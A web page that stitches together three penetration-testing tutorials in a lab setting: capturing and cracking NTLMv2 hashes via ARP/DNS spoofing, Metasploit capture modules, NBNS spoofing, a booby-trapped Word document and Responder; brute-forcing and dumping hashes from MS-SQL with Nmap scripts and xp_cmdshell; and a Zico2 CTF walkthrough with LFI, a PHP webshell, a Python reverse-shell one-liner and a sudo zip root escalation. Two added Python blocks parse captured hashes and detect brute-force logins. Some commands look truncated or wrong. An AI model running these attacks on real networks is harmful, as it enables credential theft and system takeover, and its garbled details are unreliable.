4 ways to Capture NTLM Hashes in Network

Hello friends! Today we are describing how to capture an NTLM hash in a local network. In this article we capture the NTLM hash four times, each time through a different method. Before we move on to the attack techniques, let's read a brief introduction to the NTLM hash.

The acronym NTLM combines the following terms:
NT: New Technology (Windows)
LAN: Local Area Network
M: Manager

In a Windows network, NT LAN Manager (NTLM) is a suite of Microsoft security protocols that provides authentication, integrity and confidentiality to users. It was the default for network authentication in the Windows NT 4.0 operating system. NTLMv2 is the current version; it builds on the NT hash, an MD4-based one-way function. The hash is 128 bits long and is used for both local and domain accounts.

The NTLM protocol uses one or both of two hashed password values, both of which are also stored on the server (or domain controller), and which through a lack of salting are password equivalent, meaning that if you grab the hash value from the server, you can authenticate without knowing the actual password.
For more information visit Wikipedia.org


Let’s Begin!!
Requirement
Attacker: Kali Linux
Target: Windows 10

Capture NTLMv2 hash through Sniffing

As the attacker, open the etter.dns file inside /etc/ettercap on your Kali Linux system, replace its whole contents with the line given below (it contains the attacker's IP) and save the file.
* A 192.168.1.103


Now follow the steps below to run ettercap and start sniffing.
  • Application > Sniffing & Spoofing > ettercap
  • Click on Sniff and select your network interface.
  • Scan for hosts to generate the target list.


Select the host and add it to the targets. In the image you can see that, among the 5 hosts found, I chose 192.168.1.101 as the victim and added it to Target 1.


Click on Mitm in the menu bar and select ARP poisoning; a dialog box pops up. Enable "Sniff remote connections" and click OK.


Then click on Plugins in the menu bar and choose dns_spoof.
With dns_spoof the attacker redirects the victim's DNS answers to the attacker's own IP, so whatever the victim opens in his web browser is redirected to the attacker's IP.


Now load the Metasploit framework and run the following commands to use the http_ntlm module.

This module attempts to quietly catch NTLM/LM Challenge hashes.
msf > use auxiliary/server/capture/http_ntlm
msf auxiliary(http_ntlm) > set SRVHOST 192.168.1.103
msf auxiliary(http_ntlm) > set SRVPORT 80
msf auxiliary(http_ntlm) > set URIPATH /
msf auxiliary(http_ntlm) > set JOHNPWFILE /root/Desktop/
msf auxiliary(http_ntlm) > exploit

With the trap set above, this module captures the victim's NTLM hash as soon as he opens any HTTP web site in his browser, because the site is redirected to the attacker's IP.


As the victim enters his username and password, the attacker captures the NTLM hash in the background on his own system.


From the image you can see that the attacker has captured two more things:
Username: pentest
Machine name: Desktop-UKIQM20


Now use John the Ripper to crack the NTLMv2 hash by executing the command below.
john _netntlmv2
From the image below you can confirm that we successfully retrieved the password 123 for user pentest by cracking the NTLMv2 hash.
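The file written by JOHNPWFILE (and the Responder logs later on this page) holds one NetNTLMv2 line per authentication, in the form user::domain:server-challenge:NTProofStr:blob, and the username and machine name shown above are read from that line. The following Python is an added example, not code from the original article or from Metasploit: it decodes such a line so an analyst reviewing a capture can see who authenticated, from which machine and when. The sample line is constructed, with the server challenge set to the Metasploit default and every other value invented.

```python
import struct
from datetime import datetime, timedelta, timezone

# AvPair ids (MS-NLMP 2.2.2.1) worth surfacing from a capture log
AV_NAMES = {1: "nb_computer", 2: "nb_domain", 3: "dns_computer",
            4: "dns_domain", 9: "target_name"}

def filetime_to_datetime(ft):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)

def parse_av_pairs(data):
    """Walk the AvPair list (id, length, UTF-16LE value) until MsvAvEOL (id 0)."""
    pairs, off = {}, 0
    while True:
        av_id, av_len = struct.unpack_from("<HH", data, off)
        off += 4
        if av_id == 0:
            return pairs
        if av_id in AV_NAMES:
            pairs[AV_NAMES[av_id]] = data[off:off + av_len].decode("utf-16-le")
        off += av_len

def parse_netntlmv2(line):
    """Split a john 'netntlmv2' line and decode the NTLMv2 client blob it carries."""
    user, _, domain, server_chal, nt_proof, blob_hex = line.strip().split(":")
    blob = bytes.fromhex(blob_hex)
    if blob[:2] != b"\x01\x01" or len(server_chal) != 16 or len(nt_proof) != 32:
        raise ValueError("not a NetNTLMv2 response line")
    (filetime,) = struct.unpack_from("<Q", blob, 8)  # after 2 type + 6 reserved bytes
    return {
        "user": user,
        "domain": domain,              # for a local account this is the client machine name
        "server_challenge": server_chal,
        "nt_proof": nt_proof,          # HMAC-MD5 over challenge + blob; what john cracks
        "timestamp": filetime_to_datetime(filetime),
        "client_challenge": blob[16:24].hex(),
        "target_info": parse_av_pairs(blob[28:]),  # 4 reserved bytes precede the AvPairs
    }

# Constructed sample (not a real capture): user and machine name from the article,
# server challenge equal to the Metasploit default, everything else invented.
def _av(av_id, text):
    value = text.encode("utf-16-le")
    return struct.pack("<HH", av_id, len(value)) + value

SAMPLE_BLOB = (b"\x01\x01" + b"\x00" * 6
               + struct.pack("<Q", 131500000000000000)  # 2017-09-16 01:46:40 UTC
               + bytes.fromhex("0123456789abcdef") + b"\x00" * 4
               + _av(1, "DESKTOP-UKIQM20") + _av(2, "DESKTOP-UKIQM20")
               + _av(3, "desktop-ukiqm20") + struct.pack("<HH", 0, 0) + b"\x00" * 4)
SAMPLE_LINE = ("pentest::DESKTOP-UKIQM20:1122334455667788:"
               "00112233445566778899aabbccddeeff:" + SAMPLE_BLOB.hex())

if __name__ == "__main__":
    for key, value in parse_netntlmv2(SAMPLE_LINE).items():
        print(f"{key:17} {value}")
```

The timestamp and the AvPair names come from the client, so they tell an incident responder which workstation was poisoned and when, even before any password is recovered.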


Capture NTLMv2 hash through capture SMB & spoof NBNS

This module provides a SMB service that can be used to capture the challenge-response password hashes of SMB client systems. Responses sent by this service have by default the configurable challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel, L0phtcrack or John the ripper (with jumbo patch). To exploit this, the target system must try to authenticate to this module.
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set SRVHOST 192.168.1.103
msf auxiliary(smb) > set JOHNPWFILE /tmp/john_smb
msf auxiliary(smb) > exploit

At the same time, run the nbns_response module alongside the capture/smb module.

This module forges NetBIOS Name Service (NBNS) responses. It will listen for NBNS requests sent to the local subnet's broadcast address and spoof a response, redirecting the querying machine to an IP of the attacker's choosing. Combined with auxiliary/server/capture/smb or auxiliary/server/capture/http_ntlm it is a highly effective means of collecting crackable hashes on common networks. This module must be run as root and will bind to udp/137 on all interfaces.

msf > use auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > set SPOOFIP 192.168.1.103
msf auxiliary(nbns_response) > set INTERFACE eth0
msf auxiliary(nbns_response) > exploit

As a result, this module causes a fake Windows security prompt to appear on the victim's system when it tries to connect to another system to access that system's shared folders.


We used nmap UDP and TCP port scans to identify open ports and protocols; from the image you can see that port 137 is open for the NetBIOS name service.


Now when the victim tries to access a shared folder he ends up connecting to the attacker's IP; the image below shows the victim connecting to the attacker's IP 192.168.1.103.


When the victim tries to access the shared folder, he is trapped by a fake Windows security prompt that asks him to enter his username and password to access the share.


Awesome!! Once again the attacker has captured the NTLMv2 hash; from the image you can see that here too the attacker captured two more things:
Username: pentest
Machine name: Desktop-UKIQM20


Again use John the Ripper to crack the NTLMv2 hash by executing the command below.
john _netntlmv2
From the image below you can confirm that we successfully retrieved the password 123 for user pentest by cracking the NTLMv2 hash.


Capture NTLMv2 hash through capture SMB & word UNC injector
This module modifies a .docx file that will, upon opening, submit stored netNTLM credentials to a remote host. It can also create an empty docx file. If emailed the receiver needs to put the document in editing mode before the remote server will be contacted. Preview and read-only mode do not work. Verified to work with Microsoft Word 2003, 2007, 2010, and 2013.


msf > use auxiliary/docx/word_unc_injector
msf auxiliary(word_unc_injector) > set LHOST 192.168.1.103
msf auxiliary(word_unc_injector) > exploit

It has created an empty docx file under given path /root/.msf4/local/


Now send this msf.docx file to the victim and run the capture/smb module in the Metasploit framework again, as done previously.


From the image below you can observe that the auxiliary/server/capture/smb module has been used to collect the hashes.


As soon as the victim opens the msf.docx file, the attacker captures the NTLMv2 hash on his system once more. The only difference from the two attacks above is that here we captured only the NTLMv2 hash.


Again use John the Ripper to crack the NTLMv2 hash by executing the command below.
john _netntlmv2
From the image below you can confirm that we successfully retrieved the password 123 for user pentest by cracking the NTLMv2 hash.


Responder

Responder, created by Laurent Gaffie, is an LLMNR, NBT-NS and mDNS poisoner with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication servers, and it can perform all of the attacks above. It answers specific NBT-NS (NetBIOS Name Service) queries based on their name suffix. By default, the tool only answers File Server Service requests, which are for SMB.

This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587 and Multicast UDP 5553.

Now open a new terminal and type the following commands to download it from GitHub (the upstream repository is github.com/lgandx/Responder) and enter its directory:
git clone https://github.com/lgandx/Responder.git
cd Responder


Once it has downloaded, execute the following command to run the Python script (-i is the IP to redirect traffic to, -I the interface to listen on).
python Responder.py -i 192.168.1.103 -I eth0
From the image you can see that all poisoners and server services are turned on.


Now again, when the victim tries to access a shared folder he ends up connecting to the attacker's IP; the image below shows the victim connecting to the attacker's IP 192.168.1.103.



When the victim tries to access the shared folder, he is trapped by a fake network error prompt, as shown in the image below.


Once again the attacker has successfully captured the NTLMv2 hash; from the image you can see that here too the attacker captured two more things:
Username: pentest
Machine name: Desktop-UKIQM20


Responder stores the captured NTLM hash in a text file under /root/Desktop/Responder/logs.


Again use John the Ripper to crack the NTLMv2 hash by executing the command below.
john _netntlmv2
From the image below you can confirm that we successfully retrieved the password 123 for user pentest by cracking the NTLMv2 hash.
Wonderful! These were the four ways to trap the target user in order to capture an NTLM hash.

MSSQL Penetration Testing using Nmap

Hello friends! Today we are going to perform Microsoft SQL penetration testing using Nmap scripts in order to retrieve basic information such as database names, usernames, table names and so on from an SQL Server running on a Windows operating system. In our previous article we set up Microsoft SQL Server on Windows 10.

Requirement
Attacker: Kali Linux (Nmap)
Target: Windows 10 (MS SQL Server)

Let's start!!
Scan port 1433
Open a terminal in Kali Linux and scan the target IP for port 1433 with the following nmap command.
nmap -p 1433 192.168.1.104

From given below image you can observe that port 1433 is open for MS-SQL service.



The command below attempts to determine configuration and version information for Microsoft SQL Server instances.
nmap -p 1433 --script ms-sql-info 192.168.1.104
In the image below you can observe the installed version and details of the MS-SQL server.


Brute Force Attack
The command below attempts to determine usernames and passwords through a brute-force attack against MS-SQL using a username dictionary and a password dictionary.
nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.104
In the image you can observe that we successfully retrieved credentials for two users:
  • Username: ignite and password: 12345
  • Username: sa and password: 123
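Every guess ms-sql-brute makes against the server leaves an error 18456 "Login failed for user" line with the client IP in the SQL Server ERRORLOG, which is what a defender would watch. The following Python is an added example, not from the original article or from Nmap: it parses those lines and flags any client that racks up several failed logins in a short window. The ERRORLOG excerpt is constructed to mirror the attack above (dictionary attempts from 192.168.1.103 against sa, ignite and admin, plus one unrelated failure); the line layout follows the real ERRORLOG format.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# "Login failed" line as SQL Server writes it to ERRORLOG (error 18456)
LOGIN_FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d\d) Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<client>[\d.]+)\]")

def parse_failures(lines):
    """Return (timestamp, user, client_ip) for every failed-login line."""
    found = []
    for line in lines:
        m = LOGIN_FAILED.match(line)
        if m:
            found.append((datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"),
                          m["user"], m["client"]))
    return found

def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Flag any client with >= threshold failed logins inside a sliding time window."""
    per_client = defaultdict(list)
    for ts, user, client in parse_failures(lines):
        per_client[client].append((ts, user))
    alerts = []
    for client, events in per_client.items():
        events.sort()
        best, start = 0, 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1          # slide the window forward past old events
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts.append({"client": client, "failures": best,
                           "users": sorted({u for _, u in events})})
    return alerts

# Constructed ERRORLOG excerpt (not from a real server): a dictionary attack from
# 192.168.1.103 against sa/ignite/admin, plus one unrelated failure from another host.
SAMPLE_LOG = """\
2017-09-19 10:22:13.45 Logon       Error: 18456, Severity: 14, State: 8.
2017-09-19 10:22:13.45 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.103]
2017-09-19 10:22:13.47 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.103]
2017-09-19 10:22:13.50 Logon       Login failed for user 'ignite'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.103]
2017-09-19 10:22:13.52 Logon       Error: 18456, Severity: 14, State: 5.
2017-09-19 10:22:13.52 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 192.168.1.103]
2017-09-19 10:22:13.55 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.103]
2017-09-19 10:22:13.58 Logon       Login failed for user 'ignite'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.103]
2017-09-19 10:30:01.12 Logon       Login failed for user 'bob'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.50]
""".splitlines()

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```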


Execute MS-SQL Query
Once you have retrieved the login credentials, pass them to the Nmap script to execute an MS-SQL query. The command below runs the query "sp_databases" against the Microsoft SQL server.
The sp_databases procedure belongs to the catalog stored procedures and returns a list of database names from an instance of SQL Server.

nmap -p 1433 --script ms-sql-query --script-args mssql.username=sa,mssql.password=admin123,ms-sql-query.query="sp_databases" 192.168.1.104
As a result it has dumped two database names, "ignite" and "master", where master is the default database of MS-SQL Server.



The following command attempts to describe the Microsoft SQL Server configuration settings, passing the login credentials as arguments to the Nmap script.

nmap -p 1433 --script ms-sql-config --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104
Hence you can check configuration setting from given below image.


Obtain list of tables
The following command attempts to fetch the list of tables from the Microsoft SQL server, passing the login credentials as arguments to the Nmap script.

nmap -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

Hence you can check list of tables from given below image.


Enumerate NetBIOS information

Given below NMAP script will enumerate information from remote Microsoft SQL services with NTLM authentication enabled.
Sending a MS-TDS NTLM authentication request with an invalid domain and null credentials will cause the remote service to respond with a NTLMSSP message disclosing information to include NetBIOS, DNS, and OS build version.

nmap -p 1433 --script ms-sql-ntlm-info 192.168.1.104
From the image below you can read the NetBIOS information of the remote Microsoft SQL server.


Dump password hashes

The following command dumps the password hashes from an MS-SQL server in a format suitable for cracking by tools such as John the Ripper. In order to do so the user needs to have the appropriate DB privileges.

nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

From given image you can observe that it has dumped the hash value of passwords of user: sa which we have enumerated above.


Identify database owner

The following command runs a query against Microsoft SQL Server instances for the list of databases a user has access to. In order to do so the user needs to have the appropriate DB privileges, so we pass the username and password as arguments to the Nmap script.

nmap -p 1433 --script ms-sql-hasdbaccess --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104
In the image you can observe that it shows user sa as the owner of the database "ignite".


Ms-SQL Allows XP_cmdshell option
xp_cmdshell is an extended stored procedure of Microsoft SQL Server that lets system administrators execute operating system commands. By default, the xp_cmdshell option is disabled.

From the image below you can see that we enabled xp_cmdshell by executing the following statements in the master database (the option is an advanced option, so advanced options must be shown first).
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;


Now apply the configuration change with the following statement:
RECONFIGURE;


Exploit XP_cmdshell Function
The following Nmap script attempts to run a command through the command shell of Microsoft SQL Server if xp_cmdshell is found enabled on the targeted server.
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=admin123 192.168.1.104
From the image you can confirm that we executed the OS command net user to retrieve the user accounts.


If the administrator of Microsoft SQL Server left the login password blank, an attacker can log in to the database server directly. In the image below you can see us exploring the properties of the user account "sa".




Make unauthorized access into SQL server

The following Nmap script tries to authenticate to Microsoft SQL Servers using an empty password for the sysadmin (sa) account.
nmap -p 1433 --script ms-sql-empty-password 192.168.1.104

From the image below you can see that we logged in successfully with user sa and an empty password.


Hack the Zico2 VM (CTF challenge)


Today we are going to take on another boot2root challenge, Zico2 by "Rafael", where we have to root the system to complete the challenge.
Difficulty Level: Intermediate
Penetration Methodologies
Scanning
  • Netdiscover
  • Nmap
Enumeration
  • HTTP surfing
  • Directory enumeration
Exploiting
  • LFI
  • Obtaining reverse shell via netcat
Privilege Escalation
  • Login through SSH
  • Identify user’s credential
  • Abusing SUID binaries
Capture the flag
Walkthrough
Scanning
Let's start off by finding the IP with netdiscover; in this case our target IP is 192.168.1.108.
netdiscover


Time to scan the target's IP with Nmap. The scan result shows that port 22 (ssh), port 111 (rpcbind) and port 80 (http) are open.
nmap -A 192.168.1.108


Enumeration

Since port 80 is running HTTP, our obvious choice is to browse the target's IP in the browser.


We scroll through the page and click on "check them out", as can be seen in the following screenshot.


Clicking on the previous page takes us here, where we notice that the URL asks for the tools.html page and thus could be vulnerable to LFI; let's verify it.


Here I tried LFI and succeeded with "/../../etc/passwd". Now that we can read the contents of the passwd file we find a user 'zico' in there. Let's just save this info for now.


While enumerating directories with dirb, we found an interesting directory, "/dbadmin".
dirb http://192.168.1.108/


When we browse the '/dbadmin' directory, it displays a file named "test_db.php".



Here we can see a PHP database login page along with the version name, so we can google it, or, going by the name "test_db", it hints at a default setup.
So we tried 'admin' as the password and it worked.


Next we use 'searchsploit', which, as the name indicates, searches for all exploits and shellcodes for phpliteadmin (in this case). In the screenshot we can see that it is vulnerable to remote PHP code execution and the EDB-ID for it is '24044'. Once we copy it to the current working directory (/root/24044.txt) and open it, we find guidelines for exploiting the db.

searchsploit phpliteadmin
searchsploit -m 24044
cat 24044.txt


Here we have followed the guidelines:
Step 1: Created a database and named it 'shell.php' (we had to add the extension '.php' to the database name).

Step 2: Created a table ‘shell’. Inside the table we created a column ‘field’, selected the type of the column to be an ‘Integer’ and set the default value to “ ?>”.


From the following screenshot it can be seen that our PHP code has been saved in the database.


Now we just have to run the file (the full path of the created PHP file is exposed).
To execute the file we can use the previously detected LFI vulnerability. And we got lucky, as we are inside 'www-data'.
http://192.168.1.108/view.php?page=../../usr/databases/shell.php&cmd=whoami

Time to set up a netcat listener on our local machine and run the Python code through the uploaded shell to get a reverse shell (refer to the next screenshot for the listener).
Python code reference: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

http://192.168.1.108/view.php?page=../../usr/databases/shell.php&cmd=  python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.108",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


To get a proper shell with a TTY we use a Python one-liner. Once at the shell, we find the 'wp-config.php' file inside "/home/zico/wordpress".
nc -lvp 1234
python -c 'import pty;pty.spawn("/bin/bash")'
ls
cd /home
ls
cd zico
ls
cd wordpress
ls


Inside the wp-config.php file we discover the database user zico and its password.
cat wp-config.php


We use the recently discovered credentials to log in through SSH.
Then we use the sudo command to list all the commands the user can run with root privileges, and we can see that the user can run both the tar and zip commands as root without entering a password.
So now we escalate privileges from "zico" to "root". First we create a file 'raj', then we perform three tasks in a single line of code: zip the file 'raj', write the archive to /tmp/nisha.zip and lastly have zip test-unzip it with a custom unzip command, which pops the root shell.
Finally, we get 'flag.txt' inside the root directory. Hence, we accomplished the task.

sudo -l
touch raj
sudo zip /tmp/nisha.zip /home/zico/raj -T --unzip-command="sh -c /bin/bash"
cd /root
ls
cat flag.txt